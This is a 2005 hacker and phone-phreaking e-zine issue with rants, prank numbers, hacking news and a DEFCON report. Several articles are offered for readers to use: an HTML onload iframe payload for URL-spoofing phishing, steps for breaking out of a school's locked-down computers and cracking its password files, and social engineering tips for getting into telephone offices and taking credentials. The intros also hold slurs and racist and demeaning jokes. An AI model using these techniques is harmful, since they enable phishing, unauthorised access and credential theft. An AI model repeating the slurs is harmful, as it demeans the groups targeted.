Copy Link
Add to Bookmark
Report
West Coast Phreakers Issue 05
West Coast Phreakers Presents
| | | |
| | /\ | |
| | | | | |
| | | \| |/ | | |
| | | | | |
| | \ / | |
| | || | |
| | | |
-------------------------------------------------------------------------------
"The Year of Phear" Issue #5 (August/September 2005)
-------------------------------------------------------------------------------
Holy Fuck, its the one year anniversary edition!
+_+_+_+_+_+_+_+_+_+_+_+_+_++_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+
.- Introduction -.
Opening Words ............................................ Maniak &smes
Sweet Numbers to Call ...................................... The Crew
Site of The Nite ........................................... Maniak
H/P News Board ............................................. Various
And So It's Been Said....................................... smes
_________________________________________________________________________
.- Documents -.
What I did at DEFCON 13..................................... El Jefe
Next Generation Phishing.................................... smes
A Guide through SchoolVista................................. Lghtngclp
The GTD-5 Bug............................................... Maniak
Step By Step: A true story of social engineering............ PoT
________________________________________________________________________
.- Conclusion -.
Shout Outs .................................................... The WCP Crew
Closing Words.................................................. smes
__________________________________________________________________________
***********************************************************
*smes's Great Introduction and reflection on the last year*
***********************************************************
To tell you the honest truth, I didn't think this crazy 'zine would last a year. But alas,
I have been proven wrong. I got the original idea for what is now West Coast Phreakers from browsing
around the PLA State group directory. When browsing through the list I noticed that all the Canadian
groups were long dead. So then the idea hit me harder then a transit bus would hit a toddler, and I
came up with PLVI. PLVI: Phone Losers of Vancouver Island. After getting flamed off of Cal's forums
for posting the idea I changed the name to West Coast Phreakers. I then reposted this idea around
some other forums. From this posting I got two emails: One from W Ellis (who unfortunatley I have
never heard back from) stating his intrest, and the other from some fucker named Maniak who thought
this would be a grand idea. I then found EBG hosting who, for a scant $3.15 CDN a month, hosts this
site and provides the bandwith.
Now I would like to take a look back at the year past and point out three rather interesting
somewhat h/p related events:
3) Paris Hilton's Contact List being made public:
Much like her infamous (and un-hot) sex tape spread like wildfire around the internet
last year, Ms.Hilton's Contact list made its internet debut. This made for one hell
of a weekend on the PLA voice bridge, Cal's Forums, and various other web forums. It
was celeb prank call mania. Nicky Hilton was wondering why she was on the Walmart
intercom, Paris Hilton called Baconstrips a fag, and best of all Late Night with
Conan O'Brian did a segment on the whole thing.
2) Various Other Shit:
I can't remember everything else, some small some significant, so I will list it here
in a jumbeled pile: Google Maps, New host for BinRev Radio, The Art of Intrusion, Snapple's
website being taken over by some A-Rab script kiddies,The Kevin Mitnick on Coast to Coast AM,
Hope 2004, the end of Default Radio, Hack TV ep 2, Stealing of data by malicious people,
Nettwerked Radio, the Demise of Stank Dawg and his DDP empire............. And Blah
add your own things here.
1) Teh Ladies:
Recently, I was at a party up in Courtney/Comox, BC. I starting chating up this one chick,
who was into computers and the like. In this conversation she mentioned this emagazine she
really liked called "West Coast Phreakers".
Alright enough meddling in the past, lets look now at the future/present. This issue, and
all the issues to come will be published simultaneously in a magazine like pdf, as well as
txt format. Also, Maniak is thinking of starting up an h/p contest of some sorts with cool
prizes. And finally we now have a domain name: www.westcoastphreakers.com. I am going to be
giving away @westcoastphreakers.com email addresses in the time to come for the low, low fee
of $1. Anyhow, enough from us. Enjoy the issue!
*****************************************
*A Not-so-Formal Introduction by Maniak:*
*****************************************
Wow, we managed to keep this thing going for whole year,
Well we can all just forget that last issue that never came out...
why don't we just pretend that all that time was spent making this issue the best ever made.
Ok, so obviously we threw this
version together in like 3 days instead of 2 days like usual. But fuck you, I don't see you publishing an zine,
I don't see
you fending off the adoring lady fans with sticks. You're jealous now aren't you? Alright, this is ridiculous...
someone punch
me.
Ok, moving right along, we hope you've enjoyed the WCP zine over the course of the last year. And in honour of the
one year birthday, I will blatently rip off David Letterman and present a Top Ten List of things that have severely
pissed me off during the last year:
10: Old People (what a waste of space)
9: Homeless People (remind me again why we're suppossed to help these folk?)
8: Telus (Customer Service at its best)
7: Feilds being fertilized with shit (You'd think in all of history, scientific innovation could produce
something less offensive
than animal poo)
6: People known as Sam and/or smes (Ah just kidding buddy!)
5: Gay Marriage Controversey (Honestly, who cares, let them do what they want.)
4: Establishments without debit machines that force you to use ATMs that are "conveniently located"
in the place that charge two or
more dollars for the transaction on top of what you pay to the bank for the transation.
3: Air Hand Driers in Public Wasrooms (I'm down for killing more trees if it means more paper towels)
2: Seaguls (Nature's garbage compactors)
1: Translink (Don't even get me started....but since I'm already mad just thinking about them..read below)
Let's face it, the transit system in the GVRD is terrible unless you live on No. 3 Road in
Richmond or in some other uber
high density route. Even some people I know in the city hate it for varying reasons. The main reason
you hear over and over again
is that it takes forever to get anywhere, and driving yourself is much faster. And these facts in
themselves are what makes living
with Translink so frustrating.
a) Most of the taxes and surcharges the Trasit Authority imposes are aimed at drivers.
b) People don't take transit because it's terrible.
Does this make sense to anyone? Maybe the system is purposely shitty so more people drive,
so they can collect more revenue? I
I don't know, but I do know something needs to change. People within the GVRD pay 13.75 cents a
litre to the government and an
additional 12 cents per litre goes to Translink according to the Motor Fuel Tax Act 2005.
Say you have 40 litre tank, it works
out to nearly 5 bucks a tank.
The Transit Authority has also just implimented a tax on parking spaces...yes parking spaces. The tax..
in the long run is paid for by
drivers when prices in malls where these parking spots are located go up to cover costs and protect profit.
I dont understand who's
good idea it was to rape the shit out of commuters who can't take trasit because it blows donkey cock. A good
example is the neighbourhood
where live, the bus comes twice, 6 in the morning and 6 at night. How convenient is that? They even get a cut
of property taxes...
like 20 bucks for every 100,000 your piece of land is worth.
So whats the answer to the problem? Less taxes on drivers? A better system to suppliment drivers?
I dont know what the answer is but a
big change needs to occur. Maybe the tax could be a floating tax where areas not as well served
by the transit system would have slightly
lower gas prices. But designing and implimenting such a system would be very difficult. Anyways,
I'm too mad to write any more or make this
article make more sense, later.
If you have any thoughts, gmail me at maniakwcp@gmail.com.
And now that you're all good and pissed off thinking about how Translink is busting your balls...
I present to you on behalf of myself, smes,
PoT, El Jefe and anyone else contributing to this extravaganza, WCP One Year Anniversary Specail!!!!
Enjoy!
**********************
*Sweet Number to call*
* the -wcp- crew *
**********************
519-846-8786 Dial Tone (press 9, then phone number)
519-895-2255 Please enter your passcode or call to get one call 888-288-5650 Selectcom (Social Engineering Time)
972-889-2852 VOIP CALLER ID
800-666-8061 Siren Tone
403-235-7709 "Hello, Newsroom."
202-456-9431 White House Situation Room
860-563-6571 Elevator...takes a while to pickup
888-309-2538 Advanced Telcom 5.95 per wakeup call
916-445-2864 Office of the Govenator
505-821-9894 CoCot at some casino
909-597-0004 "please enter your personal identification number, folowed by the # sign"
802-660-1642 hmmm
403-235-7796 ifb?
********************
*Site of the Nite *
********************
Leet Site:
OMGQ!!!!! LMAO PL4nES AND ROFL COPTERS ATTACKZ0R!!!!
http://img40.imageshack.us/img40/28/feuerfreimovie.swf
Cool Browser Based Game: http://www.bladesling.com/qs/
Apparently, they also like to phreak teh phones down in Australia: http://www.ausphreak.com
Also, you should check out the other West Coast Phreakers at wcp.ausphreak.com
Lame Site:
www.speedihosting.com
I tried to host this site there, but they prompty cannceled by account because they don't
allow "phreaking/hacking on their servers" and that I was hosting "illegal files".
Note: They did this before I had the chance to upload anything.
********************
*The H/P News Board*
********************
THIS CRAZY 'ZINE GETS A REGULAR PUBLISHING SCHEDULE
VICTORIA,BC-After a year of publishing West Coast Phreakers magazine on a highly irregular schedule, editor
in chief, smes had decided to publish it regulary. The issue will now be published quarterly on the 29th of October,
December, March, June, and August.
TELUS WORKERS CROSS THE LINE
Some striking Telus employees in Alberta have crossed the picket line -- but exactly how many is in dispute.
"We have 50 per cent of our employees [in Alberta] who have chosen to come back to work," Telus vice-president
of corporate affairs Drew McArthur told 24 hours. But the Telecommunications Workers Union says the numbers are
much lower than that. Whatever the percentage, McArthur says Telus is advising B.C. employees not to cross the
picket lines because of safety concerns. The two sides appear no closer to solving the three-week-old dispute
- 24 Hours (August 11th 2005)
FIREFOX HITS 80,000,000:
"It's been nine months since the release of Firefox 1.0 and with tens of millions of users we most certainly are
taking back the web. Today our Firefox web browser hit the 80,000,000 downloads mark. You can see the live counter
over at SpreadFirefox.com."
- Slashdot (August 14th 2005)
SONY PSP ATTACKED AND HACKED
Without success, Sony Corp. made efforts to keep the PSP from getting cracked. The new exploit is now widely spread
and not fully safe to run and can only work with version 1.5 "firmware". It enables users to run unauthorized pirated
games. Sony is releasing version 1.51 which will prevent the exploit. Although simple, the method for the crack requires
two memory cards which need to be changed during PSP operation. Sony officials did not immediately return requests for
comment Wednesday on the latest hack. This first time that the PSP was cracked was several months ago during it's early
release in Japan.
- GameSHOUT (August 11th 2005)
HACKERS SET OS X FREE FROM APPLE
Hackers have cracked a security feature in the forthcoming x86 OS X operating system that is designed to
prevent the software
being run on non-Apple hardware. Apple is in the process of swapping out its existing IBM PowerPC processors
for Intel's
Pentium processors. It has previously said that it will prevent the version of its operating system for
so-called Mactel
computers from running on non-certified hardware such as a computers made by Dell or HP. While the first
Intel-powered
Apple computers will not be available until the middle of next year, the computer maker last month started
shipping Developer
Transition Kits to allow software developers to test their applications for the new hardware platform.
Several developers have
reported that the kits contain the Trusted Computing Platform (TPM) security chip that prevents the software
from running on non-
Apple hardware. Apple declined to comment on the existence of the TPM in the kits. The security check in the
software has now
been circumvented. The method works only on systems with processors that suport the SSE2 or SSE3 instruction
sets that are found
in processors from Intel since 2001 and AMD since 2003. It requires a fairly advanced installation process that will be hard to
understand for regular computer users. There are several legal caveats for using the software. Most importantly,
the method relies
on pirated copies of the OS X operating system which are widely available through the file sharing networks. T
he hack is a moral
defeat for Apple, but few users will exploit the hack, predicted Martin Reynolds, research fellow at analyst firm Gartner.
"Most
PC users aren't interested," he told vnunet.com, adding that they would be unable to get support from Apple if they ran into
any
problems.
- VNUNet (August 15th 2005)
***********************
*And So its been Said *
***********************
"Dont you have some dick to suck on somewhere?"
Nah, I subcontract that shit out to your sister.
-DuckWarri0r
"Query Eye for the Oracle guy"
-Swamii
"there was a earthquake in mexico. 10 on the richter scale. 2 million mexicans died.
canada sent tons of supplies.
the european community send $20 million (except the French of corse).
and not to be outdone the US sent 2 million
replacement
mexicans"
- tjenigma1
Ausphreak - where the men are men, and the women are undercover feds.
//And Now, on do the Documents!//
**************************
*What I did at DEFCON 13 *
* by El Jefe *
**************************
For a number of years I had heard about a hacker convention and party
that took place every year in Las Vegas called DEFCON. Since I do have an
interest in hacking and phreaking, I figured sooner or later I would go to one
of these conventions. This year I finally decided to go for it. I booked a
plane ticket and a hotel room and I declared "I'm going to DEFCON!" My plane
arrived very late on Thursday night. It had been delayed by some Las Vegas
thunderstorms earlier in the afternoon. Since I had never previously visited
the city of Las Vegas, Nevada, I immediately headed to the nearest set of pay
phones, and wrote down all their phone numbers. I run a web site called Pay
Phone Directory, so this is the sort of thing I always do when I visit
someplace I have never been before. I continued gathering numbers for the next
45 minutes, ignoring the weird looks from other people in the airport,
eventually covering the entire D terminal. When I finally left the airport,
midnight had passed and it was Friday. It was time for DEFCON.
Early Friday morning I awakened to see Las Vegas in daylight for the
first time. There were hotels, casinos, and palm trees everywhere, as far as
the eye could see. It was definitely different from the area near Seattle where
I live, but it still looked sort of interesting. However, the weather was
starting to get warm already, and I needed to get from my hotel down to the
Alexis Park before it got too warm. I walked the long way to the Alexis Park in
hopes of finding some pay phones to include in the Pay Phone Directory, and
also because I needed to use the ATM at an actual branch of my bank to get cash
for DEFCON. I had heard horrible things about the ATM at the Alexis Park so I
wasn't going to touch that thing. Throughout my walk to the Alexis Park I
didn't actually find that many pay phones, which is strange for such a large
city. I did pass by a number of empty lots where old casinos had been torn down
to make way for new casinos. When I arrived at the Alexis Park, I found the
place full of people ready for DEFCON. I proceeded to the registration room,
paid my $80, and received a fluorescent green DEFCON human badge, the official
printed DEFCON schedule, a DEFCON sticker, and a DEFCON CD full of notes from
most of the talks, some MP3 audio files, and other cool stuff. I then walked
around the Alexis Park, seeing all the people who were attending DEFCON. I also
found many non-working pay phones, it seems that somebody was hacking on the
hotel's PBX, which for some strange reason provides service to the pay phones
as well. After walking around the entire Alexis Park, I proceeded to the first
talk I planned on seeing, "Hacking NMAP," presented by Fyodor. At the door, I
found a very long line that wrapped all the way around the convention center
portion of the Alexis Park, past some hotel rooms, and toward pool 1. Luckily I
got in to the talk, but all the chairs were filled and I had to stand in the
back. The DEFCON goons delayed the start of the talk to repeatedly announce
that people must not stand in front of any of the doors. Soon, the talk began.
In this talk, Fyodor described all of the wonderful advanced scanning features
of his NMAP scanning program. The talk detailed various packet tricks the
program can perform to try and get past firewalls, and it also covered a
technique that bounces packets off of 3rd party hosts so that the scanning
target doesn't find out where the scan truly came from. The talk culminated in
an example of trying to locate a hidden development server offering free porn.
The NMAP talk was very entertaining a worth the wait in that long line. The
next talk I attended was "On the current state of remote active OS
fingerprinting" by Ofir Arkin. This talk did have some good information, but it
was plagued with one big technical difficulty. The presenter's computer with
the slides was out of sync with the projector, causing rapidly flashing black
lines to appear all over the screen. Another disappointing talk from Friday was
"ATM network vulnerabilities" by Robert Morris. This talk basically consisted
of an old man telling stories about using an ATM in Norway, and describing how
ATM's are vulnerable to attacks by cutting torches and pickup trucks. No
technical information about ATM communication networks was presented. The next
talk I attended was much better. This was "Credit Cards: everything you have
ever wanted to know" by Robert "hackajar" Imhoff-Dousharm. This talk gave a
very informative overview of how credit cards are processed by merchants and
banks, and it even included a live demo with a magnetic strip reader, showing
all the information stored on most credit cards. After the credit card talk I
should have gone to "Hacking Google AdWords" by StankDawg, but instead I tried
to go to a talk on social engineering, which was cancelled because the speaker
never showed up, so I ended up wasting that hour. After that hour, I made it to
"Bypassing authenticated wireless networks" by Dean Pierce, Brandon Edwards,
and Anthony Lineberry. This talk was presented by a couple of college students,
and it basically came down to one technique, where you sniff the network to
find an existing MAC address and IP address pair, and then you spoof as that
pair, and you get access as if you were a paying customer. After this talk, the
schedule changes were getting very crazy and it was two hours before the next
talk I wanted to see. I used this time to visit the bar at Pool 1 to get some
dinner and some beers. DEFCON is always more fun when you're slightly
intoxicated. While I was eating and enjoying my beer, somebody sat down next to
me who turned out to be a speaker who was presenting the following day. We
talked briefly and I ended up going to his talk the following day. It is
possible to meet people at DEFCON. To finish off Friday at DEFCON, I went to
"Hacking Windows CE" by San, which was very technical and didn't really help me
to understand any more about buffer overflows. After that talk I saw "Hacking
in a foreign language" by Kenneth Geers. This talk was fairly informative and
explained the hacker culture of Russia and other foreign countries. The final
DEFCON event I went to on Friday night was Hacker Jeopardy. Hacker Jeopardy was
hosted by Winn Schwartau, who was accompanied by Vinyl Vanna, who operates the
question board. Hacker Jeopardy is like regular Jeopardy, but the teams can
also score points by drinking beers. If no team can answer a question, the
audience gets to participate, and whoever shouts out the right answer gets a
prize thrown to them. Friday night's round of Hacker Jeopardy was briefly
interrupted by a power failure caused by somebody sneaking up to the generator
and turning it off. Hacker Jeopardy continued anyway, and got more entertaining
as the contestants drank more beers. The winners advanced to the final round
on Saturday night. That was it for my Friday at DEFCON, and it was probably the
best day of DEFCON, as I learned a lot of things very quickly.
The following day, I headed back to DEFCON for another day of talks, a
couple of which were very good. The first talk I saw was "The hacker's guide to
search and arrest" by Steve Dunker. The presenter was previously a policeman
and is currently an attorney. He offered advice on dealing with the police and
all the legal issues about arrests and searches. The information was good, but
the talk did not specifically focus on hackers and computer crimes, just on
general crimes and criminal behavior. After this talk I tried to go to
"Introduction to lockpicking and physical security" by Deviant Ollam, but that
talk was very popular, and it filled up and I was locked out. Instead, I went
into the Vendor room and browsed all their fine products, eventually buying a
DEFCON T-shirt. The next talk I attended was the "Meet the Fed" panel. This
panel quickly degenerated into the same "Come work for us, we're the good guys,
we're the feds, we'll pay you lots of money" line coming from multiple federal
agencies. I left the talk early to line up for "A safecracking double feature"
by Leonard Gallion. This talk demonstrated a couple of safecracking techniques,
back-dialing and spiking. The demonstrations were entertaining and may even be
useful. The next talk I attended was "Old Skewl Hacking - Infrared" by Major
Malfunction. This was a very entertaining and informative talk that revealed
the simple nature of most infrared remote controls, and showed that many hotels
are trying to do too much through the television. It also demonstrated how to
get free porn, which is always a plus. After this talk, I headed to "Countering
denial of information attacks" by Greg Conti. This talk covered attacks on
intrusion detection systems by overloading them with extraneous data, and it
also demonstrated some programs written by the author which visualize network
traffic. I went to this talk because I met the speaker the previous day while
eating by the pool, and I ended up liking the talk after going to it, even
though I didn't originally plan to go to it. After this talk I went straight
to the front of the line for "Be your own telephone company with asterisk" by
Strom Carlson and Black Ratchet. I wanted to make sure I got a front row seat
for this one so I could heckle Strom Carlson. This was the best talk I went to
at the entire DEFCON, but maybe that's just because I like telephones. The
talk began with a discussion of what Asterisk is and how to connect it to
various VoIP networks. There was also a demonstration of the various Codecs,
some of which sounded great, and one which absolutely sucked. Since this talk
was two hours long, there was an intermission with a speed dialing contest
where prizes were given away. The second part of the talk focused on fun
applications involving asterisk, such as text-to-speech programs, DEFCON by
phone, which was the interactive telephone schedule which never got updated,
and NMAP by phone, which lets the caller portscan an IP address of their
choosing from their telephone, At the end there was a question and answer
period where people in the room had to line up at a telephone and wait for
Strom to call them. There was also a call in number for people who were not in
the room but were watching the talk on DEFCON TV from their hotel room at the
Alexis Park. After that wonderful talk I went to the second night of Hacker
Jeopardy. There were no power failures this time, and at the end when a winner
was determined, Vinyl Vanna flashed the audience. Saturday was also a very good
day at DEFCON.
Sunday was the last day of DEFCON. The schedule of talks ended early on
this day, so I only saw three talks. The first was "Forensic data acquisition
tools" by RS. This talk covered what forensic computer investigators should and
should not do when they are trying to preserve evidence from a compromised
computer system. This talk was prepared by RS, but the presentation was given
by somebody else because the author's employer didn't approve of him doing the
presentation. The next talk I attended was "Surgical Recovery from kernel level
rootkit installations" by Julian Grizzard. This talk discussed how kernel level
rootkits work, and how to get rid of them without erasing the disk and
reinstalling the operating system. It was fairly technical, explaining things
such as system call pointers in the Linux kernel memory, but I could still
understand what was going on, so that made this talk one of the better ones
that I saw. This talk also included some demo programs that showed recovery
from rootkits in action. The next talk I wanted to attend was "GeoIP blocking"
by Tony Howlett, but due to DEFCON's wonderful scheduling system, it got
changed to Saturday and they didn't tell anybody. The last talk I saw at DEFCON
13 was "Why tech documentaries are impossible" by Jason Scott. During this talk,
Mr. Scott talked about his various filmmaking experiences while showing part of
"The BBS Documentary" in the background. This talk was fairly interesting, as
it brought back memories of the BBS age, which is largely forgotten now due to
the prevalence of the Internet. After this talk, DEFCON was mostly over. The
only event left was the closing ceremony. During this ceremony all of the
contest winners were announced. Out of all the various contests that were
announced, the Wi-Fi shootout winners interested me the most, This team
established an unamplified wireless internet connection over a distance of 125
miles, using a pair of old satellite dishes that they had to drive up to two
remote mountaintops, one in Nevada, and one in Utah. During the closing
ceremony Strom Carlson kept running around offering a $50 reward if somebody
found his lost keys. At the end of the DEFCON 13 closing ceremony, it was
announced that there will still be another one next year. Since I had such a
fun time at DEFCON 13, I am definitely planning to return for DEFCON 14. After
DEFCON officially ended, I met up with Strom Carlson, and went back to his
hotel room, where he finally found his keys. I spent the rest of Sunday night
hanging out with Strom and the other people in his hotel room, which included
his co-presenter Black Ratchet, a friend of his called RedNerd, and a fellow
called Storm from Los Angeles. We checked out the parties by pool 2 and pool 3,
and after hanging out there for a while, we went to the Bellagio hotel and
casino on the strip for food, pay phone number gathering, and gambling. Black
Ratchet won $3. By the time we returned to the Alexis Park, things were
starting to quiet down. There were still people out by the pools, but by this
time many people had started to leave Las Vegas. In the early hours of Monday
morning, I left the Alexis Park and returned to my hotel room. My first DEFCON
had come to a close.
On Monday afternoon I headed to the airport to leave Las Vegas after my
first DEFCON experience. It was definitely a good experience, I saw many
informational hacking talks, and met a few interesting people. It also inspired
me to spend more time pursuing hacking activities than I had been doing in the
past. Hopefully, I'll have just as good of a time at the next DEFCON.
********************************************
*DOM Hijacking & Next Generation Phishing *
* by smes *
********************************************
In this article I will outline what DOM Hijacking is, and how it will create a
new generation
of phishing and the dangers that lie herein.
But before we get started, should define some important key terms:
Phishing: the act of attempting to fraudulently acquire sensitive information, such as
passwords
and credit card details, by masquerading
as a trustworthy person or business with a real need for such information in a seemingly
official electronic
notification or message
(most often an email, or an instant message). It is a form of social engineering attack.
(Source: Wikipedia)
Document Object Model:A platform- and language-neutral interface, that provides a
standard model of how the objects
in an XML object are put together, and a standard interface for accessing and manipulating
these objects and
their inter-relationships.2)
The proposed specification for how objects on a Web page are represented. Microsoft and
Netscape each advocate
their own DOM.
So the question on most people's minds right now is probably: "Just what in the hell is
DOM Hijacking, and how does it work?"
Well, DOM Hijacking is the implementation of a tag that looks a little something like this:
<body onload="document.body.innerHTML='<I' + 'frame scrolling=no frameborder=0
width=100% height=100% src=http://evilwebsite></ifr' + 'ame>';"> into the body of an HTML document.
There is no scripts involved,
so a good number of script filters are bypassed.
This example of DOM hijacking works by spawning a frame that takes up the full page.
In this frame the attacker could
create a phishing page to capture the victim's personal information. As soon as
the victim enters their personal information or other
credentials, they are taken out of frame and back to the referring document
or page in what appears to be a seamless event to them.
Now the attacker has the information he sought and can proceed in other malicious
activities such as identity theft.
DOM hijacking was once very popular in the eBay community. The attacker
would set up an auction, and use the above
tag in the item description where HTML is permitted. This would bring up a frame
asking the user for their login id.
Most users obliged to this and entered it in, noticing that the URL bar on their
browser still reported that this was a page from eBay.
Currently phishers rely on look-a-like URLs such as http://www.paypai.com, or
http://ebaysignin.com to do their dirty work.
The major problems with this approach are glaringly obvious.
Instead of this tactic, phishers could simply use this DOM exploit to spoof
the URL of a certain site while having the content of the site look legitimate.
Phishing site detection programs, or scripts
(like the one that Gmail employs) would be oblivious to such an attack.
To conclude, I would just like to restate that DOM hijacking could be a
very real threat in the time to come when combined
with ongoing phishing operations. I hope you have enjoyed reading this article as
much as I have enjoyed writing it.
******************************
*A Guide Through SchoolVista *
* by Lghtngclp *
******************************
This is basically just a compilation of things that I've discovered while
wandering around the computers system at my school. My school runs a
program called Schoolvista. It is designed to give a nice GUI that keeps
kids out of Windows(bwuahahaha). Well, I must say it doesn't do a very good
job of it. So I'll start out with a little bit of info on how to get into
the windows explorer and then give you some fun stuff to do there...
-the F1 option
This is the first way that I found to get into the "C:\" drive. First you
hit the F1 key, while in the main schoolvista "classroom". Then go to
File>>Open. The open dialog box will pop open. type C:\ into the text box
at the bottom and hit enter. You are now in the C drive. To open an
explorer window, right click on any folder and go to either explore or open.
This may cause some error thing to pop up click ok and the explorer window
will pop up. Have fun! :P
-the hyperlink option
Another way to get to the C drive is to open any program that lets you make
hyperlinks. I like word for this, because it's real easy, but any program
should work. Simply type some sort of text, anything you want and then
highlight it and right click it(or use CTRL-K if in word). Go to the option
that says hyperlink and make a hyperlink to C:\. Now when you click the
text it will open up an explorer window.
There are lots of other ways into the C drive, but I'll leave those for you
to find.
Now I want to tell you some cool things that I've found on my schools
computers. Some may not be on yours, while others may, so try some.
-winpopup
If you can get the id of another user at the school, open winpopup and have
some fun sending the messages without them having a clue where they're
coming from.
-logout.exe
This program does exactly what it's name is. Logs you out. Why is this
cool? Well, although you are logged of the schoolvista server, the schools
internet server is still active. You can now download whatever you want
without any trace.
-DOS Mode for games
This program gives you a nice DOS window to have lots of fun with. If you
don't know what to do at a DOS prompt, learn! It's lots of fun to play
around in.
There are lots of other cool things you can do including changing your
password, and of course you can use this as a launch point to crack some of
your schools password and username files. I do not claim responsibility for
any actions taken after reading this.
lghtngclp@hotmail.com
//TIME FOR SOME MORE KILLER TEXTFILES!!! YAY!!!!//
****************
*The GTD-5 Bug *
* by Maniak *
****************
So Telus operates a few GTD-5 switches round these parts. And there seems to be a
little glitch in a few of them.
If you call a phone on such a switch that normally does not accept an incoming call with some
VOIP services or
with some long distance calling cards, your call with go through and that phone will ring.
The weird part is that it doesn't always work and it doesn't work on all GTD switches.
But try it and let me know.
***************************************************
*Step By Step: A Ttrue story of Social Engineering*
* by PoT *
***************************************************
In the coming issues of WCP I'm going to include some stories of past
experiences. Many of them will be works of fiction based loosely on some of
my own experiences and experiences that have been related to me by others in
the scene. Each of these stories will hopefully be somewhat entertaining and
will also have a little bit of a lesson behind it. Hopefully everyone can get
something out of these stories and lessons.
Todays story happens to be true.
Step By Step: A true story of social engineering.
By: PoT
Background:
I used to live in Coquitlam in BC on Smith Street, well, at the end of my
street (at Blue Mountain and Smith) was the Port Moody Central Office (which
serves parts of Coquitlam and all of Port Moody). I had made countless trips
there walking around the building, peering into windows, going through the
trash (the bin has since had a lock put on it). I noticed on my many trips
there, while peering through a window in the back door, a sign that said "SXS
##" (I can't remember the #). It was something that I always thought about,
there's no way I was on an old Step switch, there was no way one was still
working anywhere in the Greater Vancouver area.
This all happened in 1994, probably around April. I was 18 at the time and
Sinner and White Night were 19.
The story:
One day, Sinner, White Night and myself got it into our head to get a tour of
a BC Tel building.
We met up near the BC Tel Boot (3777 Kingsway), we wanted mostly to get into a
CO but we would be ok getting into an Operations Centre or office even. We
decided that the best approach would be to say we were telecomunications
students from BCIT. We pulled out our trusty BC Tel Corporate Directory and
started calling COs.
We figured White Night, who's about the best social engineer I have ever seen,
would make the calls. We decided we'd try Hemlock, Mutual and New Westminster
first, they are three of the bigger COs and Hemlock was next to us and the
other two were only a short drive away, so we figured we could have fun there.
Every one of them said to either try back another time, to call BC Tel public
relations or flat out no (I don't remember which CO gave which answer).
We then decided to try some other COs, we tried Regent, Trinity and Castle
(all in Vancouver) same type of responses, except one of them didn't even
answer.
We were a little down at this point, we were discussing different approaches.
Sinner mentioned that if we knew there was something historical or different
at any of the COs we may be able to modify our story to incorporate that.
Then I remembered Port Moody and how it had that SXS sign, so we decided to
take a slightly different approach. We still went with the telecomunications
student theme, but, we said how someone in BC Tel, we gave them a name from
our trusty Corporate Directory, had told us about the SXS there and how we
were just studying them and how we would love to have a chance to see one. He
informed us that it wasn't working and that it was half-dismantled but that
also we were welcome to come and take a look at it. He told us to just come
by and knock at the back door.
So we piled into my car and made our way over to Port Moody CO. We got there
knocked on the back door and were let right in. They gave us a brief tour of
the upstairs where they had a DMS 100 set up, the switch room was so clean and
small, nowhere near what I was expecting. The rack room ended up being what I
expected though, cable EVERYWHERE. As I said, the tour of the upstairs was
quite brief, so we went downstairs to the old switch room.
There was about half of the old stepper there, we played with it a bit,
manually moving the components around. It was an experience, but, the best is
yet to come.
Also down stairs they had a DMS 1, a DMS 1 as we found out that day, is a two
piece switch used in remote areas, this particular DMS 1 was for Anmore, a
fairly small community adjoining Port Moody. One piece stays at the CO and
the other is placed in a small building or a underground vault. We asked the
usual questions you would expect us to, such as "How do you perform
diagnostics, do you have to go there to do it?" The answer we recieved was
much what we expected, it of course had a dial up that you could connect to
and play with it's configuration. The three of us then sort of split up (a
lot harder for one guy to watch three guys when they're spread out afterall)
and walked around looking at whatever we were most interested. I was over by
the stepper, White Night was over by a tool bench and Sinner was by the DMS 1.
Sinner walked over to me and whispered "Write this down 46X-XXXX, ACCT, PW" I
had nothing to write on other than a gum package, but it worked. We wandered
around for a little more, but nothing else was really that interesting so we
left.
Once we got into the car Sinner asked if I had the gum pack handy so I tossed
it to him so he wrote it down in another book. White Night had no clue what
we had done, so Sinner explained it all.
See, the dial up, account and password were written down on a post-it note on
the DMS 1 itself. Not the most secure thing to do now is it?
Afterward:
Now what did we learn from this story? I think there were a few lessons
actually:
1) Persistance: If we had given up on getting into a CO that day we never
would have had the experiences we did. If we gave up after the first six
tries we wouldn't have gotten a dial up with account and password. So, be
stubborn, it can come in handy.
2) Use all the information at your disposal: Would we have gotten the tour
had we not known about the old stepper in the basement? Possibly, but, it is
still very handy to use what you know, always preface it with a believable way
that the information came into your posession. If you can't explain how you
know it, then don't use it. There's no sense in telling them that you know
the guy who answers the phone's employee number. Also, it's not a bad idea to
play a little bit dumb on where the building is, they may feel your a bit of a
stalker, of course that does depend on how hidden of a location it is.
3) Split up: If there are more of you than "guides" split up a little, who
knows what you can find this way. Maybe a piece of paper can go missing, or a
corporate directory. At the very least you will likely get a closer look at
some things than you would otherwise.
4) Cover story: Make sure to always use a decent cover story we were 18 and
19 at the time. If your 14 nobody's gonna believe you're a university
student. Also, if your pushing 30 it may not be that believable either. Some
other options are to say your from a radio users group, a telephone
enthusiasts group (such as the Telephone Pioneers) or that your doing a high
school project on telecomunications. Just use your imagination and common
sense.
***************************************************************************
.- Conclusion -.
***************************************************************************
The Following people Contributes articles or information to this issue:
PoT, Maniak, smes, El Jefe,
and lghtngclp.
Shouts: If you want to shout out at someone leet, shout out at Rey Mesterio.
His finisher, 619, is named after his hometown's NPA.
His followup finisher, the West Coast Pop shares the initials of this crazy 'zine.
Shouts from PoT: The Luddites: Pbang & Psyko
The Vancouver 2600 crew: Ambrose, Fuzzylogik, Lazloh, Mock, Vancity Joe
The people from far and wide: Corporate Sellout, Lucky225
And of course Sinner & White Night for starring in this escapade with me.
Other Shouts: Go Daddy Domain Registery, Hack Canada, Nettwerked Radio,
Urine Trouble, theClone, tek,
any other h/per from Victoria...
*************************
*Closing Words from smes*
*************************
Well, another issue, another year come and gone.
We hope 2005-2006 will bring an insane amount of
leetness and fun like the previous year.
As Always: Keep on phearing in the free world!
-WCP
